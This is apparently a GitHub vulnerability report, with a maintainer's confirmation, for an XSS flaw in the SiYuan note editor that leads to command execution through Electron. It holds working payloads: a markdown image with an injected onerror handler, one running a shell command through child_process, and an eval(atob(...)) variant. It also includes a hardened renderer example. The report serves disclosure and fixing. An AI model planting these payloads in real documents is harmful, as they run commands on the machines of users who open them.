Describe the problem
Because tag filtering in the document body is not strict, there is an XSS vulnerability; and because `require` of `child_process` is not restricted, system commands can be executed. Likewise, system commands can also be executed through `process`.
Expected result
Fix the XSS vulnerability and the command execution caused by Electron.
Screenshot or screen recording presentation
XSS
Create a new document and insert the following PoC:
![a]("onerror="alert(1))
Effect in the client:
Effect in the browser:
Command execution
Next we can execute commands directly via `require`, for example launching Calculator. Create a new document and insert the following PoC; it triggers as soon as the user opens the document:
![a]("onerror="require('child_process').exec('open -a Calculator',null);)
The same applies on Windows and via `process`; PoC as below:
![a]("onerror="eval(atob('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')))
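As an added example (not SiYuan's own code), a constructed image renderer for the `![alt](url)` syntax showing how the double quote in the reported payload closes the `src` attribute, beside a hardened renderer that escapes attribute values and allowlists URL schemes; all function names and the sample payload string are assumptions.

```javascript
// Added example, not the project's code: why `"onerror="...` in an image URL
// becomes attribute injection, and one safe way to render the same input.
// Escaping the attribute removes the XSS; in an Electron client the second
// layer is BrowserWindow webPreferences { nodeIntegration: false,
// contextIsolation: true }, so script that still runs cannot reach require().

// Constructed naive renderer: the URL is concatenated straight into src.
function renderImageNaive(alt, url) {
  return `<img alt="${alt}" src="${url}">`;
}

// Replace every character that can terminate or alter an HTML attribute.
function escapeAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Allow relative paths plus http(s) and data:image URLs; refuse other schemes.
function isAllowedImageUrl(url) {
  const m = /^\s*([a-z][a-z0-9+.-]*):/i.exec(url);
  if (!m) return true; // no scheme: a relative path such as assets/x.png
  const scheme = m[1].toLowerCase();
  return scheme === "http" || scheme === "https" ||
    (scheme === "data" && /^\s*data:image\//i.test(url));
}

// Hardened renderer: validate the URL, then escape both attribute values.
function renderImageSafe(alt, url) {
  if (!isAllowedImageUrl(url)) {
    return `<img alt="${escapeAttr(alt)}" src="">`;
  }
  return `<img alt="${escapeAttr(alt)}" src="${escapeAttr(url)}">`;
}

// Count double quotes in rendered HTML: two per attribute is normal, more
// means the URL created extra attributes.
function countQuotes(html) {
  return (html.match(/"/g) || []).length;
}

// The payload from the report, as a constructed string, through both renderers.
const payload = '"onerror="alert(1)';
console.log(renderImageNaive("a", payload)); // src closes early, onerror appears
console.log(renderImageSafe("a", payload));  // the quote is &quot; inside src
```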
🐛 Protyle XSS leads to client RCE siyuan-note/siyuan#3431
89b53ce
Vendor confirmed, CNVD ID assigned, put on the schedule 😄
Please help keep looking for security vulnerabilities, thank you.
88250